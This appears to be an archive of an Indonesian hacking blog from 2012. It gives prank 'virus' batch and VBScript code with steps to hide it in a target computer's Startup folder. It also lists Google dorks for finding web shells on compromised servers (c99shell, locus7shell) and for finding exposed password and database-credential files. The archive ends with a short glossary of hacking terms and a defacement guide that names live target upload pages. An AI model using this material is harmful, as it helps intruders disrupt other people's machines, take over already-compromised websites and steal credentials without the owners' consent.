Rabu, 19 September 2012

Vicky Hidayat: story of school

Vicky Hidayat: story of school: This time I want to talk in english version, may also be made ​​examples of short stories or short stories in English. This time includes...

Minggu, 03 Juni 2012

.:: TUT ::. Membuat Virus Kecil Kecilan

Langsung saja sob persiapkan bahan bahan seperti
* Lapti ato Kompi sob.
* buka Notepad

1 :  Membuat virus yang dapat memunculkan pesan secara terus menerus.

@ECHO off:Begin
msg 
muka agan jelek
msg 
ngaca dulu gih
msg 
hayo lo om,cpu ente ane acak2
msg 
ud install ulang aja
msg 
biar masalah nya kelarGOTO BEGIN







( save denan extensi .bat )

2 : Caps Lock Gosht



Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell
.sendkeys "{CAPSLOCK}"loop


nb : copy kan pada notepad dan save dengan extensi .vbs

3 : Gosht Typing at Notepad

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "agan jelek banget sih!!!"
loop


( save dengan extensi .vbs )

4 : CD room Gosht

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile.vbs


cara menjalankannya :

-sob copas aja tuh script di atas ke Notepad yang sob udah sediain..

-trus sob save dengan extensi masing masing sesuai yang udah ane tuliskan di bawah scriptnya.

-klik kanan n jadiin tu file menjadi HIDDEN

-copasin ke START UP nya,,,

- RESTART laptop atau kompi target,, dan lihat hasilnya

selamat mencoba..



kalo ada pertanyaan silahkan langsung menghubungi gw

Facebook

sumber nya

Selasa, 10 April 2012

List Dork Shell Google C99 , locus7 dan FTP

33|28.45%| powered by captain crunch security team
6 |5.17%| safe-mode: off (not secure)
5 |4.31%| home
4 |3.45%| basel 2.2
4 |3.45%| safe-mode: off (not secure) drwxrwxrwx
3 |2.59%| c99memoryl
3 |2.59%| c99shell [file on secure ok ]
3 |2.59%| c99shell v. 1.0 pre-release build #16
3 |2.59%| hacker
3 |2.59%| uid=99(nobody) gid=99(nobody) groups=99(nobody)
2 |1.72%| --[ c99shell v. 1.0 pre-release build #16
2 |1.72%| basel
2 |1.72%| c99shell v. 1.0 pre-release build
2 |1.72%| powered by captain crunch security team | http://ccteam.ru |
2 |1.72%| safe-mode : off ( not secured ) drwxrwxrwx
2 |1.72%| safe-mode: off (not secure) drwxrwxrwx c99shell
1 |0.86%| !c99shell v. 1.0 pre-release build #16!
1 |0.86%| --[ c99shell v. 1.0 pre-release build
1 |0.86%| -[ c99shell v. 1.0 pre-release build #16 powered by captain cru
1 |0.86%| /opt/zope/lib/python/zdaemon/zdrun.py
1 |0.86%| allintext:"safe-mode: off (not secure)"
1 |0.86%| allinurl:selfremove
1 |0.86%| basel documentation
1 |0.86%| c99memory.php
1 |0.86%| c99shell safe-mode : off ( not secured ) drwxrwxrwx
1 |0.86%| c99shell v. 1.0 pre-release build #16 powered by captain crunch
1 |0.86%| c99shell v. 1.0 pre-release uname
1 |0.86%| c99shell v. pre-release build
1 |0.86%| captain crunch security team
1 |0.86%| code safe-mode: off (not secure) drwxrwxrwx c99shell
1 |0.86%| drwxrwxrwx c99shell filetype:php
1 |0.86%| encoder bind proc. ftp brute sec. sql php-code feedback self re
1 |0.86%| encoder tools proc. ftp brute sec. sql php-code update feedback
1 |0.86%| home updir search buffer tools proc ftp brute sec sql self remo
1 |0.86%| how to restore using !c99memory v. 1.0 pre-release build #16!
1 |0.86%| intext:c99memory v. 1.0
1 |0.86%| intext:safe-mode: off (not secure)
1 |0.86%| intext:safe-mode: off (not secure) tooling
1 |0.86%| inurl:act=sql
1 |0.86%| name asc. size · modify · owner/group · perms action
1 |0.86%| php safe-mode drwxrwxrwx
1 |0.86%| php4 timezone database
1 |0.86%| powered by captain crunch security team drwxrwxrwx
1 |0.86%| powered by captain crunch security team | http://ccteam.ru
1 |0.86%| safe mode: off ( not secure )
1 |0.86%| safe mode: off (not secure)
1 |0.86%| safe-mode: off (not secure) / tmp/ drwxrwxrwx
1 |0.86%| safe-mode: off (not secure) site:pt
1 |0.86%| shell powered by captain crunch security team
1 |0.86%| site:www.astro.mat.uc.pt basel
1 |0.86%| uid= gid= groups= sql uname -a
1 |0.86%| uid=99 ( nobody ) gid=99 ( nobody )
1 |0.86%| uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off
6 7.32% locus7shell
4 4.88% shell
3 3.66% kuwait hacker
3 3.66% php safe-mode bypass (list directories):
3 3.66% safe-mode: off (not secure)
3 3.66% safe-mode: off (not secure) drwxrwxrwx c99shell
3 3.66% startpar -f
2 2.44% hs_kuwait.php
2 2.44% lejeune interpolate
2 2.44% name asc. size · modify · owner/group · perms action
2 2.44% shell c99 ccteam.r
1 1.22% .phpact=f shell
1 1.22% 00007458 zip
1 1.22% allintitle: \locus7shell\
1 1.22% allintitle: c99memoryl
1 1.22% allinurl:upload3.php
1 1.22% astro acrobat
1 1.22% basel stellar library
1 1.22% c99memory
1 1.22% c99memoryl
1 1.22% c99shell v. 1.0 pre-release build #16
1 1.22% class-efem
1 1.22% efemerides del 22 de abril
1 1.22% encoder bind proc. ftp brute sec. sql php-
1 1.22% encoder bind proc. ftp brute sec. sql php-code feedback
1 1.22% encoder bind proc. ftp brute sec. sql php-code update feedback
1 1.22% encoder tools proc. ftp brute sec. sql php-code update feedback
1 1.22% filetype:php shell
1 1.22% foreach (array(sortsql_sort) as $v)
1 1.22% i.s.s.w team ...
1 1.22% intitle:locus7shell
1 1.22% inurl:ftpquickbrute
1 1.22% inurl:php drwxrwxr-x ftp brute sql
1 1.22% lejeune interpolation
1 1.22% lejuene interpolate
1 1.22% lmgrd_start 47
1 1.22% mysqld usage of cpu suse httpd2-prefork
1 1.22% php echo getenv
1 1.22% php4 “registered stream socket transports�
1 1.22% powered by captain crunch filetype:php
1 1.22% powered by captain crunch security team drwxrwxrwx
1 1.22% safe-mode:
1 1.22% select action/file-type:
1 1.22% software make dir upload file safe-mode
1 1.22% uid=30(wwwrun) gid=8(www)
1 1.22%
"uname -a","uid=","drwxr-xr-x","r57shell"

LOCUS7 SHELL

locus7shell
intitle:locus7shell
locus7shell filetype:php
locus7shell uname
allintitle: locus7shell
- locus7shell
intitle:- locus7shell
x2300 locus7shell
--[ x2300 locus7shell v. 1.0a beta modded by #!physx^ |
allintitle:- locus7shell
intitle: - locus7shell
safe-mode: off (not secure)
locus7shell 2008
shell x2300 locus7shell
.br - locus7shell
.us/images/0/588/mo_656_656.swf
allintext:--[ x2300 locus7shell v. modded by #!physx^
allintitle: - locus7shell
allintitle: locus7shell ext:php
allintitle:locus7shell
allintitle:locus7shell filetype:php
free locus7shell
ftp brute sec. sql php-code
inurl:act=sql
locus7s off secure
locus7s shell
ocus7shell apache
locus7shell edition 2008
locus7shell filetype: 'php'
locus7shell index:php
locus7shell linux 2008
locus7shell modified
php safe-mode bypass (list directories):
safe-mode: off (not secure) drwxrwxrwx locus7shell
%%% locus7shell
- locus7shell windows
--[ x2300 locus7shell v. 1.0a beta modded by #!physx^ | www.loc
--[ x2300 locus7shell v. modded by #!physx^ | www.locus7s.com |
--[ x2300 locus7shell v.1.0a beta modded by #!physx^ | www.locu
/locus7shell/
[enumerate] [encoder] [tools] [proc.] [ftp brute] [sec.] [sql]
allintext: locus7shell v. 1.0a beta
allintext:�safe-mode: off (not secure)�
allintitle: \locus7shell\
allinurl: .phpact=ls
apache aix aixthread_scope
ar ba locus7shell
basel
basel 3.1 library
basel interpolation
basel interpolation engine
basel spectra
c99memoryl
encoder bind proc. ftp brute sec. sql php-code feedback self re
filetype locus7shell
interpolation engine
intext:'' safe-mode:off (not secure)''
intitle:- locus7shell'
intitle:c99memoryl inurl:.php
intitle:locus7shell by filetype:php
intitle:locus7shell drwxr-xr-x
inurl:.phpact=ls
inurl:act intext:full hexdump
license.dat idl server bypass
locus7s uname
ocus7shell 2.0
locus7shell [file on secure ok ] drwxrwxrwx
locus7shell intext:x2300 intext:milw0rm.it enumerate uname
locus7shell inurl:php
locus7shell linux
locus7shell linux 2006
locus7shell safe-mode: off (not secure) drwxrwxrwx
locus7shell self remove drwxrwxrwx
locus7shell v. 1.0
locus7shell windows 2008
locus7shell-
make dir make file ok read files locus7shell
modded locus7shell
php safe-mode bypass (list directories)
php safe-mode bypass (read file)
php safe-mode bypass (read files)
safe-mode: apache uname -a: linux filetype:php
safe-mode: off (not secure) locus7shell
safe_mode: off drwxr-xr-x locus7shell
software: safe-mode: off (not secure) your ip: - server ip: [ft
suhosin 5.1.2
sybase aixthread_scope
uploads/ drwxrwxrwx
warning kernel may be alerted using higher levels safe mode
x2300 locus7shell download
x2300 locus7shell modified by #!physx^
x2300 locus7shell v. 1.0a
x2300 locus7shell v. 1.0a beta

FTP password:

intitle:"index of" spwd.db passwd -pam.conf
filetype:bak inurl:"htaccess\passwd\shadow\htusers
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:properties inurl:db intext:password
inurl:vtund.conf intext:pass -cvs
inurl:"wvdial.conf" intext:"password"
filetype:mdb wwforum
"AutoCreate:=TRUE password=*"
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" intext:"defaultpassword"
filetype:ref ref+intext:"internet account manager"
"index of/" "ws_ftp.ini" "parent directory"
filetype:ini ws_ftp pwd
inurl:/wwwboard

Kamis, 23 Februari 2012

Istilah Hacking



Untuk Menjadi Hacker Anda Harus Mengetahui sebagai berikut,berikut adalah Istilah Hacking dan juga Toolsnya:

Bug
-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

Patch
-> Perbaikan terhadap bug dengan mengupdate sistem yg vurnerable.

Vurnerable
-> Sistem yang memiliki bug sehingga rentan terhadap serangan.

RFI (Remote File Inclusion)
-> penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load

LFI (Local File Inclusion)
-> suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan)
ke page yang vulnerable (vulnerable LFI maksudnya).

SQL Injection
-> salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.


DDoS :
->Distributed Denial of Service. DoS sndiri adalah serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim,spt bandwith,memory,dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar,biasanya menggunakan bot pd irc.

Shell:
->inti dari sistem operasi.Shell mengendalikan krj sistem operasi nya.

Shell intepreter:
->bentuk antarmuka yg merupakan penghubung antara shell dgn brainware. Bentuk umumnya berupa console,cmd,webshell,dll.

Deface:
->merubah tampilan hlman suatu website secara illegal

Debug:
->kegiatan mencari bug pada aplikasi dan memperbaiki bug yg d temukan.


XSS
-> adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising
-> adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

Keylogger
-> adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

Fake Login
-> Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

Fake Process
-> Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

Malicious Code/Script
-> Kode yg dibuat untuk tujuan jahat atau biasa disebut kode jahat.

Virus
-> Kode jahat yg sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yg diinfeksinya. File yg terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yg memeriksa crc32 dari dirinya.

Worm (Cacing)
-> Kode jahat yg sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

Trojan (Horse)
-> Kode jahat yg sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

Backdoor:
->pintu belakang untuk masuk ke sistem yg telah brhasil d exploitasi oleh attacker. Brtujuan untuk jalan masuk lg k sistem korban sewaktu2.

Bind:
->membuka port pada kompi korban.Biasanya untuk tujuan backdooring. Bind umumnya disertai service2 yg lgsg mengakses shell.

Back connect :
->mendapatkan koneksi balik or mengkonek-kan kompi korban ke kompi kita.

Port:
->scr bhs artinya penghubung. Port da 2 mcm:
port fisik: penghubung antara cpu dgn hardware external.
Port service: penghubung antar service/layanan pada sistem.

Flood :
->membanjiri target untuk tujuan target down. Flood = DoS. Ada bnyk mcm flood :
tsunami flood : membanjiri user dgn karakter2 berat dgn jumlah banyak,berbentuk spt gelombang tsunami.Tujuanya hanya membuat user disconnected. Tsunami flood hny trjd d irc.
TCP Flood : membanjiri jalur tcp target sehingga target kehabisan bandwith pada port yg sedang d flood. Pd ddos web server, tcp flood d serangkan ke port 80 (http), sehingga menyebabkan jalur http penuh.
Port Scanning
-> Memindai/mencari port-port yg terbuka pada suatu server.

Exploit
-> Memanfaatkan bugs yg ditemukan untuk masuk kedalam sistem.

Cain & Abel
->program Recovery Password sekaligus Pengendus Jaringan dari Massimiliano Montoro yang bisa didownload pada 
http://www.oxid.it/. Cain & Abel mudah digunakan untuk pemula karena lebih enak dilihat untuk mata pemula seperti saya. program Cain & Abel itu terdiri dari dua buah program yang terpisah. Cain, sang kakak, adalah program dengan tampilan pengendus yang sebenarnya dan memang langsung dipasang saat anda selesai menginstal, dimana Abel, si adik, adalah jenis trojan yang menjadi remote console pada mesin target, dan tidak langsung diinstal karena otomatis jalan saat sang kakak (cain) di jalankan...

Yang Mau Request Caranya.nanti saya akan share jika ada

Sumber : Alim Kidar Hanif - HN Community

Sabtu, 18 Februari 2012

Rabu, 04 Januari 2012

Deface Web Wen.su [Duplicated Wen.ru]

Dork:
- inurl: upload.html site:wen.su
or Think it
Live target:
- http://defcell21.wen.su/upload.html
- http://madiun.wen.su/upload/index.html
Oke, untuk liat hasilnya ?
http://[localhost]/pach/your file.
Cara penggunan nya sama seperi wen.ru.
Maaf dalam postingan kali ini saya tidak menggunakan ss..
Karena menurut saya ini sangatlah mudah dan simple..

kalo pake cara wen.ru sama aja kek gitu. cuma cari dork wen.ru nya sendiri yah..
ini show off wen.ru dari hostingan gratis ane http://leviathanboys.606h.net/Dluciver4.html

selamat mencoba

thanks to HACKER-NEWBIE.ORG and all Members

Search This Blog

Popular Posts